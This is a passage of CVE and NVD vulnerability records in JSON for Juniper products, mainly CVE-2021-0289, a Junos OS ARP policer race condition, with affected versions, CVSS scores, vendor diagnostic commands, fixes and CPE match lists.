"en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-01-04T20:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "58684", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/58684" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10625" }, { "name": "1030253", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1030253" }, { "name": "67445", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/67445" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2014-3411", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Unspecified vulnerability in the NSM XDB service in Juniper NSM before 2012.2R8 allows remote attackers to execute arbitrary code via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "58684", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/58684" }, { "name": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10625", "refsource": "CONFIRM", "url": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10625" }, { "name": "1030253", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1030253" }, { "name": "67445", "refsource": "BID", "url": "http://www.securityfocus.com/bid/67445" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2014-3411", "datePublished": "2014-05-19T14:00:00", "dateReserved": "2014-05-07T00:00:00", "dateUpdated": "2024-08-06T10:43:05.463Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-0289
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://kb.juniper.net/JSA11191 | x_refsource_CONFIRM |
Vendor | Product | Version | |||||||||
---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Juniper Networks | Junos OS |
Patch: unspecified Version: 5.6R1 < 5.6* Version: 15.1 < 15.1R7-S10 Version: 16.1R1 < 16.1* Version: 16.2R1 < 16.2* Version: 17.1R1 < 17.1* Version: 17.2R1 < 17.2* Version: 17.3R1 < 17.3* Version: 17.4R1 < 17.4* Version: 18.1R1 < 18.1* Version: 18.2R1 < 18.2* Version: 18.3R1 < 18.3* Version: 18.4 < 18.4R2-S9, 18.4R3-S9 Version: 19.4 < 19.4R3-S3 Version: 20.1 < 20.1R3 Version: 20.2 < 20.2R3-S2 Version: 20.3R1 < 20.3* Version: 20.4 < 20.4R3 Version: 21.1 < 21.1R2 |
||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T15:32:10.679Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://kb.juniper.net/JSA11191" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Junos OS", "vendor": "Juniper Networks", "versions": [ { "lessThan": "5.6R1", "status": "unaffected", "version": "unspecified", "versionType": "custom" }, { "lessThan": "5.6*", "status": "affected", "version": "5.6R1", "versionType": "custom" }, { "changes": [ { "at": "15.1F1", "status": "affected" } ], "lessThan": "15.1R7-S10", "status": "affected", "version": "15.1", "versionType": "custom" }, { "lessThan": "16.1*", "status": "affected", "version": "16.1R1", "versionType": "custom" }, { "lessThan": "16.2*", "status": "affected", "version": "16.2R1", "versionType": "custom" }, { "lessThan": "17.1*", "status": "affected", "version": "17.1R1", "versionType": "custom" }, { "lessThan": "17.2*", "status": "affected", "version": "17.2R1", "versionType": "custom" }, { "lessThan": "17.3*", "status": "affected", "version": "17.3R1", "versionType": "custom" }, { "lessThan": "17.4*", "status": "affected", "version": "17.4R1", "versionType": "custom" }, { "lessThan": "18.1*", "status": "affected", "version": "18.1R1", "versionType": "custom" }, { "lessThan": "18.2*", "status": "affected", "version": "18.2R1", "versionType": "custom" }, { "lessThan": "18.3*", "status": "affected", "version": "18.3R1", "versionType": "custom" }, { "lessThan": "18.4R2-S9, 18.4R3-S9", "status": "affected", "version": "18.4", "versionType": "custom" }, { "lessThan": "19.4R3-S3", "status": "affected", "version": "19.4", "versionType": "custom" }, { "lessThan": "20.1R3", "status": "affected", "version": "20.1", "versionType": "custom" }, { "lessThan": "20.2R3-S2", "status": "affected", "version": "20.2", "versionType": "custom" }, { "lessThan": "20.3*", "status": "affected", "version": "20.3R1", "versionType": "custom" }, { "lessThan": "20.4R3", "status": "affected", "version": "20.4", "versionType": "custom" }, { "lessThan": "21.1R2", "status": "affected", "version": "21.1", "versionType": "custom" } ] }, { "platforms": [ "SRX Series" ], "product": "Junos OS", "vendor": "Juniper Networks", "versions": [ { "changes": [ { "at": "18.4R1", "status": "affected" } ], "lessThan": "18.4R2-S9, 18.4R3-S9", "status": "affected", "version": "18.4", "versionType": "custom" }, { "lessThan": "19.4R3-S3", "status": "affected", "version": "19.4", "versionType": "custom" }, { "lessThan": "20.1R3", "status": "affected", "version": "20.1", "versionType": "custom" }, { "lessThan": "20.2R3-S2", "status": "unaffected", "version": "20.2", "versionType": "custom" }, { "lessThan": "20.3*", "status": "affected", "version": "20.3R1", "versionType": "custom" }, { "lessThan": "20.4R3", "status": "affected", "version": "20.4", "versionType": "custom" }, { "lessThan": "21.1R2", "status": "affected", "version": "21.1", "versionType": "custom" } ] }, { "product": "Junos OS Evolved", "vendor": "Juniper Networks", "versions": [ { "status": "unaffected", "version": "Any" } ] } ], "configurations": [ { "lang": "en", "value": "First in config CLI mode check that is there any user ARP policers configured on an ae interface:\n\n show configuration | display set | match jtac-arp\n set groups jtac-arp-policer interfaces ae5 unit \u003c*\u003e family inet policer arp jtac-arp \u003c\u003c\u003c this shows user arp policer configured on all ae interfaces\n\nNext validate which ARP policer is installed by using the operational cli command:\n\n\u201cshow interfaces extensive | match policer\u201d\n show interfaces extensive | match policer\n Policer: Input: __default_arp_policer__ \u003c\u003c\u003c incorrect if user arp policer was applied on ae interface and default arp policer is displayed\n Policer: Input: jtac-arp-ae5.317-inet-arp \u003c\u003c\u003c correct if user arp policer was applied on ae interface" } ], "datePublic": "2021-07-14T00:00:00", "descriptions": [ { "lang": "en", "value": "When user-defined ARP Policer is configured and applied on one or more Aggregated Ethernet (AE) interface units, a Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability between the Device Control Daemon (DCD) and firewall process (dfwd) daemons of Juniper Networks Junos OS allows an attacker to bypass the user-defined ARP Policer. In this particular case the User ARP policer is replaced with default ARP policer. To review the desired ARP Policers and actual state one can run the command \"show interfaces \u003c\u003e extensive\" and review the output. See further details below. An example output is: show interfaces extensive | match policer Policer: Input: __default_arp_policer__ \u003c\u003c\u003c incorrect if user ARP Policer was applied on an AE interface and the default ARP Policer is displayed Policer: Input: jtac-arp-ae5.317-inet-arp \u003c\u003c\u003c correct if user ARP Policer was applied on an AE interface For all platforms, except SRX Series: This issue affects Juniper Networks Junos OS: All versions 5.6R1 and all later versions prior to 18.4 versions prior to 18.4R2-S9, 18.4R3-S9 with the exception of 15.1 versions 15.1R7-S10 and later versions; 19.4 versions prior to 19.4R3-S3; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S2; 20.3 version 20.3R1 and later versions; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2; This issue does not affect Juniper Networks Junos OS versions prior to 5.6R1. On SRX Series this issue affects Juniper Networks Junos OS: 18.4 versions prior to 18.4R2-S9, 18.4R3-S9; 19.4 versions prior to 19.4R3-S4; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S2; 20.3 version 20.3R1 and later versions; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2. This issue does not affect 18.4 versions prior to 18.4R1 on SRX Series. This issue does not affect Junos OS Evolved." } ], "exploits": [ { "lang": "en", "value": "Juniper SIRT is not aware of any malicious exploitation of this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-367", "description": "CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2021-07-15T20:01:05", "orgId": "8cbe9d5a-a066-4c94-8978-4b15efeae968", "shortName": "juniper" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://kb.juniper.net/JSA11191" } ], "solutions": [ { "lang": "en", "value": "The following software releases have been updated to resolve this specific issue: For all platforms, except SRX Series, using Junos OS 15.1R7-S10, 18.4R2-S9, 18.4R3-S9, 19.4R3-S4, 20.1R3, 20.2R3-S2, 20.4R3, 21.1R2, 21.2R1, and all subsequent releases. On SRX series using Junos OS 18.4R2-S9, 18.4R3-S9, 19.4R3-S4. 20.1R3, 20.4R3, 21.1R2, 21.2R1, and all subsequent releases." } ], "source": { "advisory": "JSA11191", "defect": [ "1528403" ], "discovery": "USER" }, "title": "Junos OS: User-defined ARP Policer isn\u0027t applied on Aggregated Ethernet (AE) interface until firewall process is restarted", "workarounds": [ { "lang": "en", "value": "There is no workaround for this issue. \n\nIf affected by this issue, to recover from its impact, restart the firewall process to update the ARP Policer on the AE interface unit(s). \nFrom the CLI issue: \n\n cli\u003e restart firewall \n\nNote: no side effects on firewall restart shall be seen when issuing this command." } ], "x_generator": { "engine": "Vulnogram 0.0.9" }, "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "sirt@juniper.net", "DATE_PUBLIC": "2021-07-14T16:00:00.000Z", "ID": "CVE-2021-0289", "STATE": "PUBLIC", "TITLE": "Junos OS: User-defined ARP Policer isn\u0027t applied on Aggregated Ethernet (AE) interface until firewall process is restarted" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Junos OS", "version": { "version_data": [ { "version_affected": "\u003e=", "version_name": "5.6", "version_value": "5.6R1" }, { "version_affected": "\u003c", "version_name": "15.1", "version_value": "15.1R7-S10" }, { "version_affected": "\u003e=", "version_name": "15.1", "version_value": "15.1F1" }, { "version_affected": "\u003e=", "version_name": "16.1", "version_value": "16.1R1" }, { "version_affected": "\u003e=", "version_name": "16.2", "version_value": "16.2R1" }, { "version_affected": "\u003e=", "version_name": "17.1", "version_value": "17.1R1" }, { "version_affected": "\u003e=", "version_name": "17.2", "version_value": "17.2R1" }, { "version_affected": "\u003e=", "version_name": "17.3", "version_value": "17.3R1" }, { "version_affected": "\u003e=", "version_name": "17.4", "version_value": "17.4R1" }, { "version_affected": "\u003e=", "version_name": "18.1", "version_value": "18.1R1" }, { "version_affected": "\u003e=", "version_name": "18.2", "version_value": "18.2R1" }, { "version_affected": "\u003e=", "version_name": "18.3", "version_value": "18.3R1" }, { "version_affected": "\u003c", "version_name": "18.4", "version_value": "18.4R2-S9, 18.4R3-S9" }, { "version_affected": "\u003c", "version_name": "19.4", "version_value": "19.4R3-S3" }, { "version_affected": "\u003c", "version_name": "20.1", "version_value": "20.1R3" }, { "version_affected": "\u003c", "version_name": "20.2", "version_value": "20.2R3-S2" }, { "version_affected": "\u003e=", "version_name": "20.3", "version_value": "20.3R1" }, { "version_affected": "\u003c", "version_name": "20.4", "version_value": "20.4R3" }, { "version_affected": "\u003c", "version_name": "21.1", "version_value": "21.1R2" }, { "version_affected": "!\u003c", "version_value": "5.6R1" } ] } }, { "product_name": "Junos OS", "version": { "version_data": [ { "platform": "SRX Series", "version_affected": "\u003c", "version_name": "18.4", "version_value": "18.4R2-S9, 18.4R3-S9" }, { "platform": "SRX Series", "version_affected": "\u003c", "version_name": "19.4", "version_value": "19.4R3-S3" }, { "platform": "SRX Series", "version_affected": "\u003c", "version_name": "20.1", "version_value": "20.1R3" }, { "platform": "SRX Series", "version_affected": "!\u003c", "version_name": "20.2", "version_value": "20.2R3-S2" }, { "platform": "SRX Series", "version_affected": "\u003e=", "version_name": "20.3", "version_value": "20.3R1" }, { "platform": "SRX Series", "version_affected": "\u003c", "version_name": "20.4", "version_value": "20.4R3" }, { "platform": "SRX Series", "version_affected": "\u003c", "version_name": "21.1", "version_value": "21.1R2" }, { "platform": "SRX Series", "version_affected": "!\u003c", "version_name": "18.4", "version_value": "18.4R1" } ] } }, { "product_name": "Junos OS Evolved", "version": { "version_data": [ { "version_affected": "!", "version_name": "Any", "version_value": "Any" } ] } } ] }, "vendor_name": "Juniper Networks" } ] } }, "configuration": [ { "lang": "en", "value": "First in config CLI mode check that is there any user ARP policers configured on an ae interface:\n\n show configuration | display set | match jtac-arp\n set groups jtac-arp-policer interfaces ae5 unit \u003c*\u003e family inet policer arp jtac-arp \u003c\u003c\u003c this shows user arp policer configured on all ae interfaces\n\nNext validate which ARP policer is installed by using the operational cli command:\n\n\u201cshow interfaces extensive | match policer\u201d\n show interfaces extensive | match policer\n Policer: Input: __default_arp_policer__ \u003c\u003c\u003c incorrect if user arp policer was applied on ae interface and default arp policer is displayed\n Policer: Input: jtac-arp-ae5.317-inet-arp \u003c\u003c\u003c correct if user arp policer was applied on ae interface" } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "When user-defined ARP Policer is configured and applied on one or more Aggregated Ethernet (AE) interface units, a Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability between the Device Control Daemon (DCD) and firewall process (dfwd) daemons of Juniper Networks Junos OS allows an attacker to bypass the user-defined ARP Policer. In this particular case the User ARP policer is replaced with default ARP policer. To review the desired ARP Policers and actual state one can run the command \"show interfaces \u003c\u003e extensive\" and review the output. See further details below. An example output is: show interfaces extensive | match policer Policer: Input: __default_arp_policer__ \u003c\u003c\u003c incorrect if user ARP Policer was applied on an AE interface and the default ARP Policer is displayed Policer: Input: jtac-arp-ae5.317-inet-arp \u003c\u003c\u003c correct if user ARP Policer was applied on an AE interface For all platforms, except SRX Series: This issue affects Juniper Networks Junos OS: All versions 5.6R1 and all later versions prior to 18.4 versions prior to 18.4R2-S9, 18.4R3-S9 with the exception of 15.1 versions 15.1R7-S10 and later versions; 19.4 versions prior to 19.4R3-S3; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S2; 20.3 version 20.3R1 and later versions; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2; This issue does not affect Juniper Networks Junos OS versions prior to 5.6R1. On SRX Series this issue affects Juniper Networks Junos OS: 18.4 versions prior to 18.4R2-S9, 18.4R3-S9; 19.4 versions prior to 19.4R3-S4; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S2; 20.3 version 20.3R1 and later versions; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2. This issue does not affect 18.4 versions prior to 18.4R1 on SRX Series. This issue does not affect Junos OS Evolved." } ] }, "exploit": [ { "lang": "en", "value": "Juniper SIRT is not aware of any malicious exploitation of this vulnerability." } ], "generator": { "engine": "Vulnogram 0.0.9" }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition" } ] } ] }, "references": { "reference_data": [ { "name": "https://kb.juniper.net/JSA11191", "refsource": "CONFIRM", "url": "https://kb.juniper.net/JSA11191" } ] }, "solution": [ { "lang": "en", "value": "The following software releases have been updated to resolve this specific issue: For all platforms, except SRX Series, using Junos OS 15.1R7-S10, 18.4R2-S9, 18.4R3-S9, 19.4R3-S4, 20.1R3, 20.2R3-S2, 20.4R3, 21.1R2, 21.2R1, and all subsequent releases. On SRX series using Junos OS 18.4R2-S9, 18.4R3-S9, 19.4R3-S4. 20.1R3, 20.4R3, 21.1R2, 21.2R1, and all subsequent releases." } ], "source": { "advisory": "JSA11191", "defect": [ "1528403" ], "discovery": "USER" }, "work_around": [ { "lang": "en", "value": "There is no workaround for this issue. \n\nIf affected by this issue, to recover from its impact, restart the firewall process to update the ARP Policer on the AE interface unit(s). \nFrom the CLI issue: \n\n cli\u003e restart firewall \n\nNote: no side effects on firewall restart shall be seen when issuing this command." } ] } } }, "cveMetadata": { "assignerOrgId": "8cbe9d5a-a066-4c94-8978-4b15efeae968", "assignerShortName": "juniper", "cveId": "CVE-2021-0289", "datePublished": "2021-07-15T20:01:05.615580Z", "dateReserved": "2020-10-27T00:00:00", "dateUpdated": "2024-09-17T03:48:59.800Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
Vulnerability from fkie_nvd
5.3 (Medium) - CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
▼ | URL | Tags | |
---|---|---|---|
sirt@juniper.net | https://kb.juniper.net/JSA11191 | Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://kb.juniper.net/JSA11191 | Vendor Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "matchCriteriaId": "01888A41-DD62-42C3-ADDB-9F98933D7D2C", "versionEndExcluding": "15.1", "versionStartIncluding": "5.7", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "matchCriteriaId": "D00050D6-179F-44CA-81BF-0D62A3764DF7", "versionEndExcluding": "18.4", "versionStartIncluding": "15.2", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:5.6:r1:*:*:*:*:*:*", "matchCriteriaId": "97AFB83A-B200-48DA-B976-E170BB1AB752", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:-:*:*:*:*:*:*", "matchCriteriaId": "74CA9010-D3DE-487B-B46F-589A48AB0F0A", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1:*:*:*:*:*:*", "matchCriteriaId": "A38F224C-8E9B-44F3-9D4F-6C9F04F57927", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "853F146A-9A0F-49B6-AFD2-9907434212F1", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "8F73B88B-E66C-4ACD-B38D-9365FB230ABA", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s3:*:*:*:*:*:*", "matchCriteriaId": "EE1F82EC-3222-4158-8923-59CDA1909A9C", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s4:*:*:*:*:*:*", "matchCriteriaId": "8FE95D15-B5E5-4E74-9464-C72D8B646A6B", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s5:*:*:*:*:*:*", "matchCriteriaId": "C012CD07-706A-4E1C-B399-C55AEF5C8309", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s6:*:*:*:*:*:*", "matchCriteriaId": "A0C26E59-874A-4D87-9E7F-E366F4D65ED1", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r1-s7:*:*:*:*:*:*", "matchCriteriaId": "75902119-60D0-49F8-8E01-666E0F75935A", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2:*:*:*:*:*:*", "matchCriteriaId": "D59D7A31-128B-4034-862B-8EF3CE3EE949", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "0C5E097B-B79E-4E6A-9291-C8CB9674FED5", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "819FA3ED-F934-4B20-BC0E-D638ACCB7787", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "3D7D773A-4988-4D7C-A105-1885EBE14426", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s4:*:*:*:*:*:*", "matchCriteriaId": "1BD93674-9375-493E-BD6C-8AD41CC75DD4", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s5:*:*:*:*:*:*", "matchCriteriaId": "34E28FD9-1089-42F7-8586-876DBEC965DE", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s6:*:*:*:*:*:*", "matchCriteriaId": "B7E72C49-1849-4A6F-81BC-D03F06D47D6D", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s7:*:*:*:*:*:*", "matchCriteriaId": "541535BD-20DC-4489-91A7-F6CBC6802352", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r2-s8:*:*:*:*:*:*", "matchCriteriaId": "924C4EAC-2A52-45A9-BE0F-B62F070C3E3D", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3:*:*:*:*:*:*", "matchCriteriaId": "736B7A9F-E237-45AF-A6D6-84412475F481", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s1:*:*:*:*:*:*", "matchCriteriaId": "62E63730-F697-4FE6-936B-FD9B4F22EAE8", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s2:*:*:*:*:*:*", "matchCriteriaId": "064A7052-4EF5-4BFB-88FF-8122AEECB6A7", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s3:*:*:*:*:*:*", "matchCriteriaId": "08C58CCB-3BAA-4400-B371-556DF46DE69C", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s4:*:*:*:*:*:*", "matchCriteriaId": "28F7740D-C636-4FA3-8479-E5E039041DA6", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s5:*:*:*:*:*:*", "matchCriteriaId": "81F6DEA3-F07E-4FD0-87CB-4E8C0B768706", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s6:*:*:*:*:*:*", "matchCriteriaId": "2C1601BB-CAB7-4C92-8416-1824BB85D820", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s7:*:*:*:*:*:*", "matchCriteriaId": "14FC491D-8DA8-4E79-A9A6-3629E41C847A", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:18.4:r3-s8:*:*:*:*:*:*", "matchCriteriaId": "44C4BE2C-814F-49AA-8B64-17245FC01270", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r1:*:*:*:*:*:*", "matchCriteriaId": "DC743EE4-8833-452A-94DB-655BF139F883", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "FE96A8EA-FFE3-4D8F-9266-21899149D634", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "C12A75C6-2D00-4202-B861-00FF71585FA0", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r1-s3:*:*:*:*:*:*", "matchCriteriaId": "70FF3DD4-14CB-435D-8529-0480EB853F60", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r2:*:*:*:*:*:*", "matchCriteriaId": "4DCFA774-96EF-4018-82CF-95C807025C24", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "76022948-4B07-43CB-824C-44E1AB3537CB", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "25446F60-5CB9-4923-BCE8-609AE3CFDFBC", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "A23E5CEA-EFF5-4641-BC47-BA2D0859F0EE", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r3:*:*:*:*:*:*", "matchCriteriaId": "758275F3-9457-45A2-8F57-65DCD659FC1B", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r3-s1:*:*:*:*:*:*", "matchCriteriaId": "B46CB928-78B5-4D60-B747-9A0988C7060D", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:19.4:r3-s2:*:*:*:*:*:*", "matchCriteriaId": "ED73BF1A-96E4-49F1-A6AA-7B29DAA6C112", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r1:*:*:*:*:*:*", "matchCriteriaId": "8328FDE6-9707-4142-B905-3B07C0E28E35", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "41CD982F-E6F2-4951-9F96-A76C142DF08E", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "19FDC05F-5582-4F7E-B628-E58A3C0E7F2F", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r1-s3:*:*:*:*:*:*", "matchCriteriaId": "401306D1-E9CE-49C6-8DC9-0E8747B9DC2C", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r1-s4:*:*:*:*:*:*", "matchCriteriaId": "615EAF48-AD53-4CC2-B233-5EA5C0F72CB1", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r2:*:*:*:*:*:*", "matchCriteriaId": "DC8E7547-6649-436D-BC45-184417680C72", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.1:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "D9789FF8-D55C-4AF9-A250-E543A0EB826F", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r1:*:*:*:*:*:*", "matchCriteriaId": "CD07B7E2-F5C2-4610-9133-FDA9E66DFF4F", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "D3C23AEB-34DE-44FB-8D64-E69D6E8B7401", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "18DB9401-5A51-4BB3-AC2F-58F58F1C788C", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r1-s3:*:*:*:*:*:*", "matchCriteriaId": "06F53DA5-59AE-403C-9B1E-41CE267D8BB1", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r2:*:*:*:*:*:*", "matchCriteriaId": "3332262F-81DA-4D78-99C9-514CADA46611", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "B46B63A2-1518-4A29-940C-F05624C9658D", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "8E0D4959-3865-42A7-98CD-1103EBD84528", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "3A58292B-814C-49E7-8D6D-BE26EFB9ADDF", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r3:*:*:*:*:*:*", "matchCriteriaId": "681AE183-7183-46E7-82EA-28C398FA1C3D", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.2:r3-s1:*:*:*:*:*:*", "matchCriteriaId": "8A6E9627-8BF1-4BE8-844B-EE8F1C9478F0", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.4:r1:*:*:*:*:*:*", "matchCriteriaId": "20DDC6B7-BFC4-4F0B-8E68-442C23765BF2", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "037BA01C-3F5C-4503-A633-71765E9EF774", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.4:r2:*:*:*:*:*:*", "matchCriteriaId": "C54B047C-4B38-40C0-9855-067DCF7E48BD", "vulnerable": true }, { "criteria": "cpe:2.3:o:juniper:junos:20.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "38984199-E332-4A9C-A4C0-78083D052E15", "vulnerable": true }, { "criteria": 